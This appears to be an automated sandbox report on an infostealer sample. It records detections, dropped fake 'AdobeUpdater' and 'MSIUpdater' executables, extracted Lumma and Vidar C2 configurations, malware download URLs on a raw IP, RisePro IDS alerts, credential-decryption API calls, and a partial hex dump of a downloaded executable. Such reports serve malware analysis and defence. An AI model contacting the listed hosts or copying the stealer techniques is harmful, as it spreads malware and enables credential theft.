Source: swellfrrgwwos.xyz	Avira URL Cloud: Label: malware
Source: https://potterryisiw.shop/apip	Avira URL Cloud: Label: malware
Source: foodypannyjsud.shop	Avira URL Cloud: Label: malware
Source: pedestriankodwu.xyz	Avira URL Cloud: Label: malware
Source: http://77.105.132.27/meta2806.exe/risep	Avira URL Cloud: Label: malware
Source: https://potterryisiw.shop/l	Avira URL Cloud: Label: malware
Source: https://potterryisiw.shop/api1	Avira URL Cloud: Label: malware
Source: http://77.105.132.27/lumma2806.exe	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vidar2806[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1317026
Source: C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe	Avira: detection malicious, Label: HEUR/AGEN.1317026
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Avira: detection malicious, Label: HEUR/AGEN.1317026
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\rise2806[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1317026
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Avira: detection malicious, Label: HEUR/AGEN.1317026
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\3f61nAONpe1PsLC0oJHy.exe	Avira: detection malicious, Label: HEUR/AGEN.1317026
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Avira: detection malicious, Label: HEUR/AGEN.1317026
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Avira: detection malicious, Label: HEUR/AGEN.1317026
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\lumma2806[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1317026
Source: C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe	Avira: detection malicious, Label: HEUR/AGEN.1317026
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Avira: detection malicious, Label: HEUR/AGEN.1317026
Source: C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe	Avira: detection malicious, Label: HEUR/AGEN.1317026

Found malware configuration

Source: 00000024.00000002.1988085776.00000000004F4000.00000004.00000001.01000000.0000000A.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199707802586", "https://t.me/g067n"], "Botnet": "254862acdd5c5d2dddb209d751490c15"}
Source: 38.2.RegAsm.exe.400000.0.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["pedestriankodwu.xyz", "towerxxuytwi.xyzd", "ellaboratepwsz.xyzu", "penetratedpoopp.xyz", "swellfrrgwwos.xyz", "contintnetksows.shop", "foodypannyjsud.shop", "potterryisiw.shop", "potterryisiw.shop"], "Build id": "H8NgCl--default2806"}

Multi AV Scanner detection for domain / URL

Source: http://77.105.132.27/rise2806.exe

Virustotal: Detection: 12%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	ReversingLabs: Detection: 68%
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	ReversingLabs: Detection: 68%
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	ReversingLabs: Detection: 55%
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\AdobeUpdaterV168.exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV168_b055341c05e33d6c2334ce6d41cea915\AdobeUpdaterV168.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\AdobeUpdaterV168.exe	ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\rise2806[1].exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\lumma2806[1].exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\meta2806[1].exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vidar2806[1].exe	ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\3f61nAONpe1PsLC0oJHy.exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	ReversingLabs: Detection: 78%

Multi AV Scanner detection for submitted file

Source: zyJWi2vy29.exe	ReversingLabs: Detection: 68%
Source: zyJWi2vy29.exe	Virustotal: Detection: 43%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\meta2806[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vidar2806[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\rise2806[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\3f61nAONpe1PsLC0oJHy.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\lumma2806[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: zyJWi2vy29.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000023.00000002.1894557765.0000000000520000.00000004.00000001.01000000.0000000B.sdmp	String decryptor: pedestriankodwu.xyz
Source: 00000023.00000002.1894557765.0000000000520000.00000004.00000001.01000000.0000000B.sdmp	String decryptor: towerxxuytwi.xyzd
Source: 00000023.00000002.1894557765.0000000000520000.00000004.00000001.01000000.0000000B.sdmp	String decryptor: ellaboratepwsz.xyzu
Source: 00000023.00000002.1894557765.0000000000520000.00000004.00000001.01000000.0000000B.sdmp	String decryptor: penetratedpoopp.xyz
Source: 00000023.00000002.1894557765.0000000000520000.00000004.00000001.01000000.0000000B.sdmp	String decryptor: swellfrrgwwos.xyz
Source: 00000023.00000002.1894557765.0000000000520000.00000004.00000001.01000000.0000000B.sdmp	String decryptor: contintnetksows.shop
Source: 00000023.00000002.1894557765.0000000000520000.00000004.00000001.01000000.0000000B.sdmp	String decryptor: foodypannyjsud.shop
Source: 00000023.00000002.1894557765.0000000000520000.00000004.00000001.01000000.0000000B.sdmp	String decryptor: potterryisiw.shop
Source: 00000023.00000002.1894557765.0000000000520000.00000004.00000001.01000000.0000000B.sdmp	String decryptor: potterryisiw.shop
Source: 00000023.00000002.1894557765.0000000000520000.00000004.00000001.01000000.0000000B.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000023.00000002.1894557765.0000000000520000.00000004.00000001.01000000.0000000B.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000023.00000002.1894557765.0000000000520000.00000004.00000001.01000000.0000000B.sdmp	String decryptor: - Screen Resoluton:
Source: 00000023.00000002.1894557765.0000000000520000.00000004.00000001.01000000.0000000B.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000023.00000002.1894557765.0000000000520000.00000004.00000001.01000000.0000000B.sdmp	String decryptor: Workgroup: -
Source: 00000023.00000002.1894557765.0000000000520000.00000004.00000001.01000000.0000000B.sdmp	String decryptor: H8NgCl--default2806

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004C6B00 CryptUnprotectData,CryptUnprotectData,LocalFree,LocalFree,	20_2_004C6B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00407E41 CryptUnprotectData,LocalAlloc,LocalFree,	24_2_00407E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0040AB80 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	24_2_0040AB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00407DC2 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	24_2_00407DC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0041302D CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	24_2_0041302D

Source: zyJWi2vy29.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49814 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49821 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49832 version: TLS 1.2

Source: zyJWi2vy29.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000018.00000002.2948532623.000000001A12A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2955355624.0000000020098000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.24.dr

Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Code function: 0_2_0033AAC7 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_0033AAC7
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Code function: 10_2_006EAAC7 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	10_2_006EAAC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004C6000 CreateDirectoryA,FindFirstFileA,FindNextFileA,GetLastError,FindClose,	20_2_004C6000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_00432022 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,	20_2_00432022
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004E6770 FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,GetLastError,std::_Throw_Cpp_error,std::_Throw_Cpp_error,CreateDirectoryA,std::_Throw_Cpp_error,std::_Throw_Cpp_error,	20_2_004E6770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004938D0 FindFirstFileA,FindNextFileA,GetLastError,FindClose,	20_2_004938D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_00493B60 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,SHGetFolderPathA,FindFirstFileA,FindNextFileA,FindClose,CreateDirectoryA,CreateDirectoryA,CreateDirectoryA,CopyFileA,CreateDirectoryA,CreateDirectoryA,CopyFileA,CopyFileA,CredEnumerateA,SHGetFolderPathA,GetPrivateProfileSectionNamesA,GetPrivateProfileStringA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrlenA,SHGetFolderPathA,GetPrivateProfileSectionNamesA,GetPrivateProfileStringA,lstrlenA,SHGetFolderPathA,GetPrivateProfileSectionNamesA,GetPrivateProfileStringA,lstrlenA,SHGetFolderPathA,GetPrivateProfileSectionNamesA,GetPrivateProfileStringA,lstrlenA,SHGetFolderPathA,GetPrivateProfileSectionNamesA,GetPrivateProfileStringA,CreateDirectoryA,CreateDirectoryA,CreateDirectoryA,lstrlenA,	20_2_00493B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004DFF00 CreateDirectoryA,FindFirstFileA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,GetLastError,GetLastError,CreateDirectoryA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetCurrentHwProfileA,GetModuleHandleExA,GetModuleFileNameA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetComputerNameA,GetUserNameA,GetDesktopWindow,GetWindowRect,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,GetLocalTime,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesA,EnumDisplayDevicesA,CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,RegOpenKeyExA,RegEnumKeyExA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,RegCloseKey,	20_2_004DFF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_00431F9C FindClose,FindFirstFileExW,GetLastError,	20_2_00431F9C
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Code function: 22_2_00E4D43A FindFirstFileExW,FindNextFileW,FindClose,FindClose,	22_2_00E4D43A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00409FC0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	24_2_00409FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0040C039 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	24_2_0040C039
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0040C6B5 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	24_2_0040C6B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00401443 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	24_2_00401443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0040BC98 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	24_2_0040BC98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_004164C7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,lstrcat,lstrcat,PathMatchSpecA,FindNextFileA,FindClose,	24_2_004164C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_00416D7D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	24_2_00416D7D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0041738D GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	24_2_0041738D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_004177D3 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	24_2_004177D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0040E016 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	24_2_0040E016

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2049060 ET TROJAN RisePro TCP Heartbeat Packet 192.168.2.4:49747 -> 77.105.132.27:50500
Source: Traffic	Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 77.105.132.27:50500 -> 192.168.2.4:49747
Source: Traffic	Snort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 77.105.132.27:50500 -> 192.168.2.4:49747
Source: Traffic	Snort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.4:49747 -> 77.105.132.27:50500
Source: Traffic	Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 77.105.132.27:50500 -> 192.168.2.4:49756
Source: Traffic	Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 77.105.132.27:50500 -> 192.168.2.4:49786
Source: Traffic	Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 77.105.132.27:50500 -> 192.168.2.4:49787
Source: Traffic	Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 77.105.132.27:50500 -> 192.168.2.4:49802

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: pedestriankodwu.xyz
Source: Malware configuration extractor	URLs: towerxxuytwi.xyzd
Source: Malware configuration extractor	URLs: ellaboratepwsz.xyzu
Source: Malware configuration extractor	URLs: penetratedpoopp.xyz
Source: Malware configuration extractor	URLs: swellfrrgwwos.xyz
Source: Malware configuration extractor	URLs: contintnetksows.shop
Source: Malware configuration extractor	URLs: foodypannyjsud.shop
Source: Malware configuration extractor	URLs: potterryisiw.shop
Source: Malware configuration extractor	URLs: potterryisiw.shop
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199707802586
Source: Malware configuration extractor	URLs: https://t.me/g067n

Source: global traffic	TCP traffic: 192.168.2.4:49747 -> 77.105.132.27:50500
Source: global traffic	TCP traffic: 192.168.2.4:49764 -> 195.201.251.214:9000

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 07:16:12 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Sun, 30 Jun 2024 07:51:24 GMTETag: "1c4c00-61c16bf47b4d0"Accept-Ranges: bytesContent-Length: 1854464Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ed bc 81 78 a9 dd ef 2b a9 dd ef 2b a9 dd ef 2b 7a af ec 2a b8 dd ef 2b 7a af ea 2a 00 dd ef 2b 7a af eb 2a bf dd ef 2b 6b 5c eb 2a bb dd ef 2b 6b 5c ec 2a bc dd ef 2b 7a af ee 2a ae dd ef 2b a9 dd ee 2b 28 dd ef 2b 6b 5c ea 2a fc dd ef 2b 5a 5f ea 2a a8 dd ef 2b 5a 5f ef 2a a8 dd ef 2b 5a 5f ed 2a a8 dd ef 2b 52 69 63 68 a9 dd ef 2b 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 71 0e 81 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 40 02 00 00 18 1a 00 00 00 00 00 52 74 00 00 00 10 00 00 00 50 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 1c 00 00 04 00 00 00 00 00 00 03 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 c0 f5 02 00 50 00 00 00 10 f6 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 1c 00 1c 1d 00 00 68 d8 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 d7 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 02 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 06 2e 02 00 00 10 00 00 00 30 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 42 73 53 00 00 00 00 1d 0e 00 00 00 40 02 00 00 10 00 00 00 34 02 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 ae 00 00 00 50 02 00 00 b0 00 00 00 44 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 34 49 19 00 00 00 03 00 00 3a 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 1c 1d 00 00 00 50 1c 00 00 1e 00 00 00 2e 1c 00 00 00 00 00 00 00 00 00 